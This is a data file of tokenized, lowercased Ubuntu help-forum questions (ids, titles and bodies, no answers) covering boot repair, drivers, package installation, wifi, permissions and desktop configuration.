401792	gnupg gpg2 idea	i 'm trying to use my old pgp keys with gnupg via gpg2 . i 've successfully imported the keys both public and secret from my old key ring . i 've just tried to decrypt a file but i have the following error . me @ ubuntu : ~/documents $ gpg2 -d test01 gpg : protection algorithm 1 ( idea ) is not supported the other data for the keys come up . gnupg offers an explanation about patents ( the idea patent is n't compatible with gnupg ) and a remedy : both here , http : //www.gnupg.org/faq/why-not-idea.html i followed the instructions at the end of the link and imported the idea.c.gz files into ~/.gnupg and unzipped them ( only one of them unzipped ) and tried to ./configure . this did n't work . i made a directory called cipher , moved the two files into it and tried the ./configure command again . the system could n't find configure . can anyone help me , please ?
401793	downgrade gnome 3.10 to gnome 3.8 ?	i found some problems with gnome 3.10 , so i want to downgrade to the 3.8 . my ubuntu versio is 13.10 .
401796	why are usb devices not loaded in my computer ?	i have two laptops with ubuntu 12.04 . one does n't present problems with the usb 's , but i mention it because i compare each other 's behaviour and know for sure that there 's something wrong with the other one . what happens is that i do n't get an icon in the launcher for the usb device , whether it 's a flashdrive or an ipod . the only thing that i see is a folder named usb0 , but it 's not recognized as the flashdrive . i would like to know why it 's not loading it properly and what i can do to reset it . thank you for your help .
401798	grub boot error	i am new to linux , and i tried to instal ubuntu 12.04 desktop version on my laptop . unexpectedly , the below error was appeared while the ubuntu was installed : grub-efiamd64-signed package failed to install into /target/ . currently i am using windows 7 and i want to dual boot it with ubuntu 12.04 please help me fix it
401800	unable to connect to open wifi on a headless ubuntu on arm	i have headless ubuntu 13.10 on a little arm device ( a beaglebone ) with a wifi adapter connected to it . i 'm unable to get an ip from dhcp : 'sudo dhclient wlan0 ' takes a while to run and when it comes back the wlan0 still does n't have an ip . i added this to /etc/network/interfaces auto wlan0 iface wlan0 inet dhcp wireless-essid msftopen wireless-channel 1 wireless-mode managed the wifi adapter does show up in ifconfig and iwconfig but it just does n't get an ip . here 's the output of iwconfig and ifconfig : $ ifconfig wlan0 wlan0 link encap : ethernet hwaddr 00:9e:95:9b:58 : a5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) $ iwconfig wlan0 ieee 802.11bgn essid : '' msftopen '' mode : managed frequency:2.412 ghz access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . usb0 no wireless extensions . the network i 'm trying to connect to does show up when doing iwlist wlan0 scan . here 's the snippet : cell 04 - address : 00:24:6c:2c : a4:21 channel:1 frequency:2.412 ghz ( channel 1 ) quality=35/70 signal level=-75 dbm encryption key : off essid : '' msftopen '' bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000139a19b001 extra : last beacon : 72ms ago ie : unknown : 00084d5346544f50454e ie : unknown : 01088c129824b048606c ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 2d1acc111bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601001b000000ff000000000000000000000000000000 ie : unknown : dd1e00904c33cc111bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c3401001b000000ff000000000000000000000000000000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd0a00037f04010000000000 any ideas what i should try here ?
401802	unable to boot into windows 8	i installed ubuntu alongside with my windows 8 . i have 3 partitions . after installing ubuntu , i am unable to get into windows 8 . the error that i get is file : \boot\bcd status : 0xc000000c info : the boot configuration data for your pc is missing or contains errors . i tried running boot-repair but it still has not worked . here 's the boot repair url : http : //paste.ubuntu.com/6711446 also , here 's a screen shot from gparted . http : //i.stack.imgur.com/9pjk6.png i 'd really appreciate any help as i need to use my windows 8 as well . thank you !
401803	ubuntu corrupted log files	it seems that all my log folders located in /var/log are turning into files . for example , if i try to tail /var/log/apache2.log it will say `` no such file or directory '' i can see it in the file structure but ca n't do a single thing with it . i am experiencing some major problems overall with my ubuntu 12.04 lts . any ideas what this could be ? update : here 's an error when i try to restart apache : root @ ww2 : ~ # sudo service apache2 restart * restarting ( 20 ) not a directory : apache2 : could not open error log file /var/log/apache2/error.log . unable to open logs also output requested ( ls -la /var/log ) : -rw-r -- r -- 1 root root 0 jan 7 17:05 mysql -rw-r -- r -- 1 root root 0 jan 7 17:05 mysql.err -rw-r -- r -- 1 root root 0 jan 7 17:05 mysql.log -rw-r -- r -- 1 root root 0 jan 7 17:05 mysql.log.5.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 mysql.log.6.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 mysql.log.7.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 mysql.log.8.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 news -rw-r -- r -- 1 root root 0 jan 7 17:05 nginx -rw-r -- r -- 1 root root 0 jan 7 17:05 php5-fpm.log -rw-r -- r -- 1 root root 0 jan 7 17:05 plesk-install -rw-r -- r -- 1 root root 0 jan 7 17:05 plesk-roundcube -rw-r -- r -- 1 root root 0 jan 7 17:05 psa-horde -rw-r -- r -- 1 root root 0 jan 7 17:05 railgun -rw-r -- r -- 1 root root 0 jan 7 17:05 rkhunter.log -rw-r -- r -- 1 root root 0 jan 7 17:05 rkhunter.log.old -rw-r -- r -- 1 root root 0 jan 7 17:05 sa-update.log -rw-r -- r -- 1 root root 0 jan 7 17:05 sw-cp-server -rw-r -- r -- 1 root root 0 jan 7 17:05 sw-cp-server_back -rw-r -- r -- 1 root root 0 jan 7 17:05 sw-cp-server_backup -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog.1 -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog.2.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog.3.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog.4.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog.5.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog.6.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 syslog.7.gz -rw-r -- r -- 1 root root 0 jan 7 17:05 udev -rw-r -- r -- 1 root root 0 jan 7 17:05 ufw.log -rw-r -- r -- 1 root root 0 jan 7 17:05 upstart -rw-r -- r -- 1 root root 0 jan 7 17:05 wdcollect.log -rw-r -- r -- 1 root root 768 jan 7 17:24 wtmp -rw-r -- r -- 1 root root 0 jan 7 17:05 wtmp.1 output of ( ls -la /var/log/apache2 ) -rw-r -- r -- 1 root root 0 jan 7 17:05 /var/log/apache2 output of mount : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) doing a /forcefsck i get these at startup : https : //www.dropbox.com/s/26uz62ocsilzz68/screenshot % 202014-01-07 % 2018.23.21.jpg https : //www.dropbox.com/s/1qb26n6hp9ljh4u/screenshot % 202014-01-07 % 2018.23.04.png
401807	pop-up reminder and todo app ?	does anyone know of a reasonably lightweight app for ubuntu that can sit in the system tray and pop up to remind me of various tasks ? something like kalarm is exactly what i am looking for , but on my system i seem to suffer from the bug regarding shutting down ( i.e . kalarm or perhaps nepomuk stalls the shutdown by a few minutes , and i get the report about processes still running etc ) . thus , i 've had to remove kalarm and need to find an alternative . can anybody recommend something ?
401815	i am trying to re install vista on a machine that has ubuntu and another linux system on it	the install disk wont accept any of the partitions to install on . it asked about drivers and best ive found out there is a format issue . if you can be of any help please and hold the jokes about vista being like wanting to move to n korea . thanks
401818	how to write native ubuntu programs with monodevelop ?	i have written few simple console c # programs in monodevelop but it seems they run in some emulated enviroment while debugging . the end result is a .exe file which does not runs natively on ubuntu . what i need to know is if mono is same as visual c # on windows ? can we create native gui applications with monodevelop just as we can with qt creator ( linux ) /visual studio ( windows ) ? if yes , how ? if no , why ? why we need mono on linux ?
401820	high-level library for unity dash ?	i 've wanted to write a gtk+ version of unity dash for some time . i think it could be useful for xfce , gnome flashback , elementaryos , etc . before i start doing anything about it , i 'd like to know if there are any high-level libraries to search scopes , use filters , etc . a gir-lib would be very nice . does anything like this exist , or am i going to have to do all the dbus stuff myself ?
401821	add-apt-repository ppa : gives me errors	i 'm new to ubuntu ( 12.04.3 ) . i 'm trying to install handbrake and i 've tried about 6 different ways non seem to work , so i 'm now asking for help . step 1 sudo add-apt-repository ppa : stebbins/handbrake-releases $ sudo add-apt-repository ppa : stebbins/handbrake-releases traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 128 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 35 , 'gnutls_handshake ( ) failed : a tls packet with unexpected length was received . ' ) i get and error what does the error mean and how do i fix it ? in file /etc/apt/sources.list i have this # # ppa : stebbins/handbrake-releases deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu quantal main deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu quantal main if i ignore the error and continue . step 2 sudo apt-get update i get . w : failed to fetch http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu/dists/oneiric/release unable to find expected entry 'deb-src/binary-i386/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . again if i ignore the message and continue . step 3 sudo apt-get install handbrake i get . package handbrake is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source w : duplicate sources.list entry http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu/ oneiric/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_stebbins_handbrake-releases_ubuntu_dists_oneiric_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : package 'handbrake ' has no installation candidate if i use sudo apt-get install handbrake-gtk i get this . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . handbrake-gtk : depends : libgstreamer-plugins-base1.0-0 ( > = 1.0.0 ) but it is not installable depends : libgstreamer1.0-0 ( > = 1.0.0 ) but it is not installable depends : gstreamer1.0-libav but it is not installable depends : gstreamer1.0-plugins-base but it is not installable depends : gstreamer1.0-plugins-good but it is not installable depends : gstreamer1.0-plugins-bad but it is not installable depends : gstreamer1.0-plugins-ugly but it is not installable depends : gstreamer1.0-pulseaudio but it is not installable e : unable to correct problems , you have held broken packages . *sigh nothing works : (
401822	disabling nvidia card on asus ul30jt	i 'm a new linux user , and i recently installed ubuntu on my asus ul30jt . the pc runs quite hot , and i randomly stumbled upon this : http : //www.grimsby.us/ubuntu-on-asus-ul30vt/ from what i understand , my nvidia card is probably still on and using power , and probably also creating excess heat ? anyway , i was not able to use the method presented on that page . i tried installing the linked software , but it ended in an error . how do i disable my nvidia card ?
401825	can juju add-machine be used to prepare a machine for service deployment ?	i 'm using juju 1.16.3 and i am attempting to use juju add-machine to get a maas node ready for a service deployment . i want to get ubuntu installed and ready so service deployment takes less time . the machine is started and the os installed , and the agent-state is `` started '' . however , when i deploy a service , it decideds to start a new machine anyway and ignores the one already started . when i deploy the service without doing add-machine beforehand , then a new machine is automatically allocated from maas and the service deploys to it just fine . the only difference is that when i do juju add-machine prior to deploying the service , it wo n't deploy to that machine . am i misunderstanding the purpose of add-machine ? if so , what is the proper method for preparing a machine with a base os prior to service deployment ?
401827	is there a ubuntu multudimenesional desktop tool ?	i want to be able to like rotate to new desktops on ubuntu .
401828	ca n't use 1440x960 resolution	i just got a new computer and i installed all the drivers properly , but i ca n't find my resolution for my computer . my computer is : • operating system : windows 2.6.1.7601 ( service pack 1 ) • cpu : intel core i5-3340 3.10ghz • ram : 8.53gb • graphics card memory : 4.23gb • graphics card driver : nvd3dum.dll • resolution : 1280x960 • hard disk : 322.23 gb • monitor : lg flatron w1934s when i right-click on my desktop pick screen resolution , and go to resolution , i ca n't find 1440x960 .
401830	how to escape from rhythmbox party mode ?	i 'm trapped in a party ! is there a hotkey to recover normal rhythbox window mode ( instead of whole-fullscreen ) ? or how to locate a config file of rhythmbox ?
401832	`` makedeb.sh : no such file or directory '' while installing back in time	clearly i 'm a linux sub-rookie ... all i 'm trying to do is to install `` back in time '' . according to the developer 's web site i am to type the following commands : ./makedeb.sh sudo dpkg -i backintime-common- < version > .deb sudo dpkg -i backintime-gnome- < version > .deb sudo dpkg -i backintime-notify- < version > .deb source : in the readme file , in the installer package at : http : //backintime.le-web.org problem is when i enter just the fist line , it replies saying : makedeb.sh : no such file or directory i also typed sudo just in case , without avail : ( can someone help me ?
401839	running commands on startup on ubuntu 13.10 with xmonad and zsh	there are several commands i would like automatically run on startup ; remapping keys with xmodmap , opening a terminal and a browser , etc . i 'm trying to figure out how to run a set of commands on startup without using gnome ( as i use xmonad ) or a .bashrc file ( as i use zsh ) . any suggestions ?
401849	flash and usb drives showing up as ro in gnome	can not drag and drop items onto flash and usb drive . receiving an error stating that the device is read-only , however , i am able to copy to these devices from the cli .
401854	my swap partition resets to `` unknown '' at every boot	i wanted to fix the the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present error message on boot , so i followed the advices given here what to do about `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' ? now what happens is that when i reboot after having formatted my swap partition to linux-swap , it resets to an `` unknown '' partition ( as displayed in gparted ) . though it seems to exist and function , i still get that `` disk drive not ready '' on boot . so what about ? is this all normal ? swapon -s : filename type size used priority /dev/mapper/cryptswap1 partition 8349692 0 -1 free -m : total used free shared buffers cached mem : 7953 1607 6345 0 111 604 -/+ buffers/cache : 892 7060 swap : 8153 0 8153
401857	what path do i need to give to 'dd ' when creating a bootable usb stick on mac os ?	i downloaded ubuntu desktop and trying to create a bootable usb stick on mac os following the guide on ubuntu.com . however , i 'm stuck at the following step : execute sudo dd if=/path/to/downloaded.img of=/dev/rdiskn bs=1m ( replace /path/to/downloaded.img with the path where the image file is located ; for example , ./ubuntu.imgor ./ubuntu.dmg what is the path where the image file is located ? i ca n't figure it up . any support would be great appreciated .
401858	where can i find linux drivers for my pc running ubuntu ?	i have a very old hp compaq d530 cmt that i put ubuntu on , but there is something screwed up . i only see a desktop pic and nothing else , but i already got help for that here . the dash and launcher is still missing , so i think that i need drivers for this old pc , but i do n't know what to get and i do n't know what brand the gpu is , but is is onboard graphics . the motherboard is 323091-001
401861	how can i make it easier to move the browser window ?	i am running the latest ubuntu but it is hard to get the curser to move a browser windows out of the way . i am using the arcvamarin theme i think
401862	ubuntu 13.04 : ca n't login using ubuntu ( default ) session . stuck in login loop	when i try to login using ubuntu ( default ) session , i am unable to login . after giving password i am getting this message on screen unable to launch `` gnome-session -- session=ubuntu '' x session -- - `` gnome-session -session=ubuntu '' not found ; falling back to default session . however , i am able to login using ubuntu studio session or xfce session or using ctrl+alt+f1 . i have tried with no success to rename / remove .xauthority chown username : username .xauthority using gdm ( i was not able to see login screen after using gdm as default and rebooting . i was just seeing blinking cursor ) ls -lah reveals -rw-rw-r -- 1 username username 0 jan 8 10:39 .xauthority -rw-rw-r -- 1 username username 38 jan 7 16:17 .xsession -rw -- -- -- - 1 username username 418 jan 8 10:39 .xsession-errors -rw -- -- -- - 1 username username 418 jan 8 10:39 .xsession-errors.old contents of .xsession-errors/.xsession-errors.old are as follow unable to launch `` gnome-session -- session=ubuntu '' x session -- - `` gnome-session - session=ubuntu '' not found ; falling back to default session . sudo : no tty present and no ask program specified script for cjkv statrted at run_im . script for default started at run_im . script for cjkv statrted at run_im . script for default started at run_im . /home/username/.xsession line 1 : /usr/bin/gnome-session : permission denied permission for /usr/bin/gnome-session are as follow -rw-rw-rw- 1 root root 236k mar 21 3013 /user/bin/gnome-session please help in this regard .
401863	why does ubuntu keep asking me for my wi-fi password ?	i have searched the internet but have found no solutions . i recently built a computer and intstalled ubuntu on it . i put a wireless dongle in it and connected to the internet , it worked . so a few days later i moved the computer to somewhere else and changed the wi-fi network . now the new wi-fi keeps asking me for the password over and over . i know it works , i had it connected to the internet at a different access point . i am new to linux and i would appreciate some help .
401865	blender causes my screen backlights to flicker	i am using a desktop with a radeon hd 5xxx cgu . every time i work with blender ( no matter the version ) , my screen flickers at what seems to be random times ( meaning i do n't feel i am doing anything special when it happens ) . the backlight brightness gets weaker , then back to normal . i 've seen it happen a couple of times before , though i did n't really pay attention thinking this was a problem with the power or whatever , but with blender it is quite constant .
401867	epson xp-410 drivers	i 'm on the latest ubuntu iteration , 13.10 i believe , and i cant find any drivers for my printer . when i tried to use the generic drivers it just prints out symbols and when i try to use other epson drivers it will print in weird colors . so my question is this , are there ways to get the drivers for ubuntu or will i just have to use windows whenever i want to print something ? its an epson xp-410
401871	ubuntu-sdk installation on saucy salamander 13.10 does not show ubuntu project templates	i 've installed the ubuntu-sdk using the instructions here , wherein i was instructed to execute sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get dist-upgrade & & sudo apt-get install ubuntu-sdk the installation succeeded , at least in some ways . however , i see that in the tutorials there is a project wizard which includes a set of project types for ubuntu projects . upon starting the ubuntu-sdk from dash , and attempting to start a new project using ctrl+n , i see the following : it can be plainly seen that there is no `` ubuntu '' project template category . how can i resolve this problem ? i 've launched qtcreator with qtcreator -customwizard-verbose full text here http : //pastebin.com/vcbpunay i see that there are missing wizard.xml files referenced in that file . is it possible that these are the cause of the problem ? i 'm running : distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy
401873	becoming invisible on the network	while i am using my ubuntu os , i would like to be invisible on the network . i was told that if i use a vpn that i am completely invisible on the network and no one can find me since i am using the vpn 's servers and tunnels . if i am using a vpn , is that true that i would be invisible on the network when using wifi at a public place as well as at home with my wireless connection ? : )
401876	apt-get command not found	i was going to update all the software on a linux server . i have root access into this server . i tried to type sudo apt-get update , i got an error says apt-get : command not found $ uname -a linux r1web 2.6.32-358.6.1.el6.i686 # 1 smp tue apr 23 18:13:20 utc 2013 i686 i686 i386 gnu/linux please tell me how to fix this problem . thanks !
401882	how to move ubuntu grub from usb to hdd boot	my question is virtually the same as another asked here ( how to move ubuntu 12.04lts from usb to hdd ) , but a little ambiguity leaves me wondering if the answer applies to me . i installed ubuntu to boot from a 4gb usb drive with a 8gb linux partition residing on the hdd alongside a windows partition . with the usb drive plugged in , i get a grub boot menu that includes my linux install and windows 7 . with the usb unplugged it boots directly into windows . i want to revise the installation so that it boots from grub without the usb drive plugged in . assistance in how to do that , or confirming that the answer given in the existing thread applies to my condition as well , is appreciated .
401884	mapping left ctrl+right ctrl to switch-windows	i 'd like to add left ctrl+right ctrl to the switch-windows keybinding . is there a way to distinguish between the left and right ctrl keys when typing that command ? maybe something like : gsettings set org.gnome.desktop.wm.keybindings switch-windows `` [ ' < alt > tab ' , ' < lcontrol > < rcontrol > ' ] '' however , that command does n't work . i was wondering if there are actually key names specifically for the left ctrl and the right ctrl keys . if you 're curious why i 'd want to do this , i have a kinesis keyboard , and it would it 's default layout makes one stretch their left hand to hit alt+tab .
401890	what is a web based vpn for ubuntu ?	does anyone know of a vpn that works through the web . specifically , suppose that there are two computers such the only open port is 80 on each of them . also , you ca n't open any other ports . how do you simulate an open port , such that it is like they are on the same local network with whatever open ports are wished . it should also ( obviously ) work with ubuntu . the reason why i want this , is so that i could show my dad how to set up ssh at places he ca n't open ports . note : it should n't break port 80 for other purposes , such as web browsing . preferably , it should just act like a normal web connection using normal web protocols , but use those protocols to send information that would go over other ports .
401892	drive auto mounting as read only ( errors=remount-ro )	my system is auto-mounting as read only and i have no idea why . output of fstab : cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=28db2489-f60e-456c-9efd-7a961f3e970a / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=106e4470-d734-4cec-98a6-c7859aaedf18 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 output of mount : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) i have searched all night including : ubuntu 12.04 ssd root frequent random read only file system i have no idea why this is going on . i did run fsck at boot and it did n't find errors . the disk is fine ( 500gb , user 38gb )
401893	how can i free up space on my main partition and change target directory of apt-get installations ?	here 's the situation : i 'm using the tool `` crouton '' on an acer c7 chromebook to run xubuntu 12.04 alongside chromeos . i mounted the 320gb partition onto `` /media/test/ '' , but the main partition which includes `` /home/ryan/ '' ( used by chromos for most stuff ) is only around 4gb and is completely out of space . i used ppa-repositories and apt-get to install a few programs in xubuntu and it looks like by default they were installed on the smaller drive . my question is two fold : 1 ) can i view hidden files and find any places in `` / '' that i can delete some files and free up space ? 2 ) how can i do a apt-get uninstall & purge and reinstall the programs to /media/test/ where there is plenty of free space ?
401895	using crossover to install e-sword	downloaded crossover application . attempted to install but receive the following error : on 64-bit flavors of debian and some ubuntu variants , first open a terminal and run 'sudo dpkg -- add-architecture i386 ; sudo apt-get update' thanks !
401901	vsftpd allowing a user to edit any file	i finally got vsftpd working with pam and mysql , and i want to know how i can have an ftp user that makes editing the server easily . essentially what i want is for my ftp user to be able to have the ability to edit any and all files on my system . i know that it 's basically root ( i know it is dangerous , i plan to use ssl , and my server is small scale ) , but i need it to be on the other user . so , what config can i change to make just this one user have the ability to edit any files ? obviously , i do n't want to do /chown on every file in the system , or /chmod to allow any user to edit . thanks in advance , mad3ngineer
401904	wifi not recognized by ubuntu with pre installed win8 ( 12.10 )	i recently installed 12.04 ( and currently upgrading to 12.10 ) onto my computer so i could dual boot win8 , via bootable flash drive . after much frustration , i finally got ubuntu to work , but it will not recognize the wireless driver . when i type in iwconfig it shows i have no etho and lo connection . i can however connect to the internet via a wired connection . so , i tried installing the bcm via synaptic and that did n't do anything . i uninstalled and reinstalled..still nothing . i tried using the `` additional drivers '' on settings to no avail . so , what can i do ?
401920	what does > > or double angle brackets mean ?	it seems like such a simple questions but i cant find any resource regarding it in c/c++ , it means to store the read in a value from command prompt and store it inside a variable , how about in shell programming ?
401927	after i installed ubuntu via usb i do n't know how to access it any more . what do i do ?	i am trying to dual-boot and this is my first time ever with ubuntu . also it kept saying something about not having enough disk space . how do i install it to my hdd ? all i 've done is boot it from usb and installed it but the only way back is installing again i think .
401931	unity global menu options disabled for certain applications	i am using ubuntu 13.10 , and am also using the gnome 3.10 staging , next , etc . ppas . i have cinnamon , gnome shell and unity environments installed . all the environments and applications work fine . however , there is a slight nuisance with the unity global application menus for certain applications . for example , the global menu options are disabled ( grayed out ) for say gedit . again , the menu options work properly for a few other applications . any suggestions to solve this issue is appreciated .
401935	could not install boot-repair package on 13.04	i 'm trying to fix my poor broken grub , so , i inserted my sd card and choose the `` try ubuntu '' option ( version : 13.04 ) , and then opened the terminal and input the following commands : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) as intructions from here : https : //help.ubuntu.com/community/boot-repair after the update command , i 've got the following output : w : failed to fetch bzip2 : /var/lib/apt/lists/partial/ubuntu.cn99.com_ubuntu_dists_raring_main_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/ppa.launchpad.net_yannubuntu_boot-repair_ubuntu_dists_raring_main_binary-amd64_packages hash sum mismatch thus , the boot-repair package cound not be installed , i 've done the same thing just the day before yesterday and everything was ok , what can i do to repair my grub ?
401937	installation for dummies	i would like to use ubuntu on a virtual machine so that i can run an open source engineering software called openfoam . i need instructions for a layperson . i did n't know what a virtual machine was two days ago , i do n't know what an image file is , etc . i 'm used to downloading software and using it . every website i visit that claims that its instructions are for `` dummies '' provides instructions that i do n't understand . i thought i 'd just click on the orange 64 bit button on the ubuntu website for 13.10 , that it would download and that i 'd somehow install it on a virtual machine . that download looks like it would take 10+ hours . can anyone help me with lay-language ?
401938	grub menu appearing without timeout after rtcwakeup	i am attempting to set up a remote server at home while i am off at college . i have a few scripts i would like to run using rtcwake . however , whenever the computer wakes up the grub menu will always appear without a timeout , even through i have the menu and timeout disabled . i know grub.conf is ok because i can start the computer without the menu appearing . are there any known workarounds for this issue or are there any alternatives for remote power control ? here is the contents of my grub.conf folder : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=1 grub_hidden_timeout_quiet=true grub_timeout=1 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 thanks again
401941	what is the difference between security , updates , proposed and backports in /etc/apt/apt.conf.d/50unattended-upgrades ?	i see the following lines in /etc/apt/apt.conf.d/50unattended-upgrades . but i 'm not able to find the man page for them . could anybody point me the detailed document for each of them ? thanks . unattended-upgrade : :allowed-origins { `` $ { distro_id } : $ { distro_codename } -security '' ; `` $ { distro_id } : $ { distro_codename } -updates '' ; // `` $ { distro_id } : $ { distro_codename } -proposed '' ; // `` $ { distro_id } : $ { distro_codename } -backports '' ; } ;
401944	is wine installed ?	i downloaded wine1.6 from winehq.org and did the following ./configure -- enable-win64 -- without-freetype make make install now when i right click on .exe > open with wine windows program loader nothing happens . also wine -- version says no command wine found trying open with with right-click on exe shows following dialogue box .
401945	can not boot ubuntu 12.04 ( no boot option )	this might be a common issue , but i can not find any other words to describe my problem . after i uninstalled opensuse and deleted the boot option towards this os in order to have no trouble booting on windows 8 , i can not boot any linux distro anymore after they 're being installed . the reason why i post this on ask ubuntu is that ubuntu is my favorite distribution and i an currently using it in a live device . i do not like windows 8 that much ( i got my asus laptop xc551ca less than two months ago ) . i know what to do in order to get to the ubuntu desktop on a live device . my problem is that i can not find any boot option in the bios uefi . i do not know how to add a boot option in the bios . i have tried linux mint and opensuse once more and both do not work . i really need to get with ubnutu as soon as possible . i need to keep video editing on kdenlive , i started several months ago and i ca n't do on a virtual machine on windows ( no ! it does n't work either and it is a painful experience ! ) anyone who experienced my problem and solved it , or anyone familliar with this issue is more than welcome to answer and/or comment ! as usual , i appreciate your time and wisdom . this is very urgent and i am pretty much un the rush . thank you ! laptop identification : asus x551ca x series 750 gb hard disk windows 8 alongside ubuntu 12.04 lts have tried several distros ( and a windows program easybsd : unsuccessful ! ) experienced with installing and uninstalling linux distributions completely not experience with creating the boot options not really familliar with the bios boot repair ? did n't work ( both the cd and the program on the live usb that i downloaded once i booted onto ubuntu ) thank you again !
401948	how to create launcher icon	i recently installed matlab r2013a and it is working fine , however the only way i can start it is by running /usr/local/matlab/r2013a/bin/matlab in the terminal . if i type in matlab it says command not found , and i ca n't seem to get an icon in the side-bar launcher . how can i make it so i can run from the command matlab or from a launcher ? edit : i have created a link so i can launch it by typing matlab in the terminal . i still ca n't get the unity icon launcher working though . i managed to create an icon via a matlab.desktop file in /usr/share/applications . when i click it , it launches matlab , but after the initial loading screen matlab shuts down instead of launching the application . it works through the terminal though . my matlab.desktop file is : [ desktop entry ] type=application name=matlab comment=matlab r2013a icon=/usr/share/icons/matlab.png exec=/usr/local/matlab/r2013a/bin/matlab categories=office terminal=false`
